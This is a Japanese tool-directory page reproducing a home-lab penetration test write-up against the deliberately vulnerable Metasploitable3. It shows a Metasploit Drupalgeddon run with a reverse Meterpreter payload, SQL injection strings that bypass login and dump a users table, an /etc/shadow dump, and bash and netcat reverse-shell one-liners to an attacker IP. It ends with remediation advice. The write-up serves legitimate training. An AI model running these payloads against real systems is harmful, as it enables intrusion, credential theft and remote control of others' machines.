Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
metasploitable3-pentest-writeup — Metasploitable3のホームラボペネトレーションテストレポート。Nmap偵察、Drupalgeddon RCE、SQLインジェクション、SSH認証情報の再利用、sudo権限昇格、リバースシェルを網羅。 | Kitploit
ツール/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
特権昇格偵察パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトCTFペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
学習と教育
ラボと実践
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

Metasploitable3のホームラボペネトレーションテストレポート。Nmap偵察、Drupalgeddon RCE、SQLインジェクション、SSH認証情報の再利用、sudo権限昇格、リバースシェルを網羅。

リポジトリを見る
119時間15分前未レビュー

Metasploitable3 — ペネトレーションテストレポート

著者: Arlen Fortunato
日付: 2026年9月
環境: Parrot OS (攻撃側) → Metasploitable3 Ubuntu 14.04 (ターゲット)
スコープ: フルネットワークペネトレーションテスト — 列挙、エクスプロイト、権限昇格、ポストエクスプロイト
種別: ホームラボ / Capture The Flag 練習

⚠️ 以下の認証情報はすべて伏せ字です。これは合法的な、隔離されたホームラボ演習でした。


使用ツール

ツール役割
Nmapポートスキャン、サービス/バージョン検出、OSフィンガープリント
Metasploit (msfconsole)エクスプロイト (CVE-2014-3704)、セッション管理
msfvenomペイロード生成 (bash/netcat リバースシェル)
nc (netcat)リバースシェルリスナー
curl / sed手動SQLi作成 + HTML出力整形
ssh / scpリモートアクセス、認証情報検証
openssl s_clientTLS/SSLサービス検証
gobusterディレクトリブルートフォース (Web列挙)

偵察 — Nmap 全ポートスキャン

root@kitploit:~
nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>

OS: Linux Ubuntu 14.04, Kernel 3.13.0-24-generic x86_64


検出事項サマリー


検出詳細

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — 誤検知

脆弱性: UnrealIRCd 3.2.8.1 は歴史的に、未認証のクライアントが登録前にトリガー文字列を送信すると任意のコマンドを実行するトロイの木馬化されたバイナリと共に配布されていました — IRCデーモンユーザーとしてのRCEです。

エクスプロイト試行: Metasploitモジュール exploit/unix/irc/unreal_ircd_3281_backdoor をペイロード cmd/unix/reverse_perl、cmd/unix/reverse_netcat、cmd/unix/reverse_bash で使用。モジュールの自動チェックはサービスを脆弱と報告しましたが、どのペイロードでもセッションは返りませんでした。

実施したトラブルシューティング:

  • ポート到達可能 (nc -vz)
  • ポートがTLSではなく平文IRCであることを確認 (openssl s_client)
  • ターゲットからの手動リバースコネクトバックでアウトバウンドネットワークが機能することを確認
  • nc 経由の手動バックドアトリガーはIRCプロトコルエラー 451 を返した — コマンドはIRCコマンドとして解析され、実行されることはなかった

結論: バージョンバナーは脆弱なビルドを示しているが、このインスタンスにはバックドアが存在しない (クリーン/再コンパイルされたバイナリ)。証拠と共にエクスプロイト不可 — 誤検知と分類。


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

脆弱性: Drupal 7.x の 7.32 より前には、データベース抽象化レイヤーに重大なSQLインジェクションが存在し、未認証のリモートコード実行を可能にします。

バージョン確認: CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

エクスプロイト:

root@kitploit:~
msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

結果:

root@kitploit:~
getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

ポストエクスプロイト列挙:

  • /var/www/html: chat/、drupal/、payroll_app.php、phpmyadmin/
  • /home: 16ユーザーアカウント

3. 給与アプリ — UNIONベースSQLインジェクション (手動)

脆弱性: payroll_app.php ログインフォーム、パスワードフィールドのSQLインジェクション。自動化ツールは未使用 — curl で作成。

ステップ1 — 認証バイパス:

root@kitploit:~
' or 1=1#

' はSQL文字列を閉じ、or 1=1 は真を強制し、# は末尾のクォートをコメントアウトします。

ステップ2 — カラム数 + 表示マッピング:

root@kitploit:~
' UNION SELECT null, null, null, null#     -- no error = 4 columns
' UNION SELECT 1, 2, 3, 4#                 -- markers: 1=Username, 2=First, 3=Last, 4=Salary

ステップ3 — information_schema 列挙:

質問回答
DBバージョン / ユーザーMySQL 5.5.62, root@localhost
データベース

ステップ4 — ダンプ (パスワードは伏せ字):

root@kitploit:~
' UNION SELECT username, password, salary, null FROM users#

4. SSH — デフォルト認証情報 & 認証情報の使い回し

経路1 — デフォルトアカウント: デフォルトの vagrant 認証情報ペアがSSH経由で認証成功 → sudo グループのユーザーで (ALL : ALL) NOPASSWD: ALL。

経路2 — 認証情報の使い回し: SQLiダンプから収集した認証情報が、別のラボユーザー (luke_skywalker、sudo グループ、(ALL : ALL) ALL) としてSSH経由で直接認証成功。

意義: サービス間の認証情報使い回しを実証 — アプリケーションの認証情報がシステムアカウントにマッピングされた。


5. 権限昇格 (2つの経路)

  • 経路A: vagrant → sudo -l が NOPASSWD: ALL を表示 → sudo su - → uid=0(root)。
  • 経路B: luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root)。

ローカルエクスプロイトは不要 — 両アカウントが過度に許可的なsudo権限を保持していた。


6. Shadow ダンプ

root@kitploit:~
sudo cat /etc/shadow

16個の md5crypt ($1$) ハッシュを抽出 — 権限昇格後の完全な認証情報収集。


7. ポストエクスプロイト — リバースシェル

ペイロード1 — bash:

root@kitploit:~
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

nc -lnvp 4444 で捕捉 → 対話型シェル。

ペイロード2 — netcat (名前付きパイプ):

root@kitploit:~
mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

nc -lnvp 4445 で捕捉 → 対話型シェル。

仕組み: 名前付きパイプ (FIFO) が netcat の stdin/stdout を /bin/sh にブリッジし、単一ソケットの双方向トンネルを形成。FIFOはその後クリーンアップされる。


修復推奨事項


免責事項

すべてのテストは、意図的に脆弱なソフトウェア (Rapid7 Metasploitable3) を使用した隔離されたホームラボでのみ実施されました。本番システムや未承認のターゲットには一切関与していません。このレポートは教育目的および個人のスキル開発のみを目的としています。

ツールをダウンロード
ポート状態サービスバージョン
21/tcpopenFTPProFTPD 1.3.5
22/tcpopenSSHOpenSSH 6.6.1p1
80/tcpopenHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpopenSMBSamba smbd 3.X–4.X
631/tcpopenIPPCUPS 1.7
3306/tcpopenMySQLMySQL (unauthorized)
3500/tcpopenHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpopenIRCUnrealIRCd
8080/tcpopenHTTPJetty 8.1.7.v20120910
#脆弱性CVE / 種別ポート深刻度結果
1UnrealIRCd バージョンフィンガープリント — バックドアプローブCVE-2010-20756697⚠️ 誤検知モジュール自動チェックは合格、手動プローブは失敗 — このビルドにバックドアは存在しない
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 重大www-data として Meterpreter シェル
3給与アプリ — UNION SQLi (手動)手動インジェクション80🔴 重大完全なDBダンプ (15ユーザー、平文パスワード — 伏せ字)
4SSH — デフォルト + 使い回し認証情報デフォルト / 認証情報使い回し22🔴 重大vagrant (NOPASSWD sudo)、luke_skywalker (sudo ALL)
5権限昇格 (2つの経路)設定不備の sudoN/A🔴 重大両アカウント経由で root
6Shadow ダンプポストエクスプロイトN/A🔴 重大16個の md5crypt ハッシュを抽出
7リバースシェル (bash + netcat)msfvenom / 手動作成4444/4445🟠 高攻撃側リスナーで対話型シェルを捕捉
information_schema, drupal, mysql, payroll, performance_schema
payroll 内のテーブルusers
users 内のカラムusername, first_name, last_name, password, salary
ユーザー名パスワード給与
leia_organa[REDACTED]9560
luke_skywalker[REDACTED]1080
han_solo[REDACTED]1200
artoo_detoo[REDACTED]22222
boba_fett[REDACTED]20000
greedo[REDACTED]50000
(+ 他9アカウント)[REDACTED]—
検出事項推奨事項
UnrealIRCd バージョンフィンガープリントバイナリソースの完全性を検証 (チェックサム)。アップグレードまたは削除
Drupal 7.5最新の安定版にアップグレード。SA-CORE-2014-005 を適用
給与SQLiパラメータ化クエリ / プリペアドステートメント。入力を検証
デフォルトSSH認証情報デフォルトアカウントをローテーション/削除。鍵ベース認証を強制
Sudo過剰権限最小権限を適用。NOPASSWDの包括的付与を削除
認証情報の使い回しサービスごとに一意のパスワードを強制。パスワードポリシー
弱いパスワードハッシュmd5crypt → bcrypt / Argon2id に移行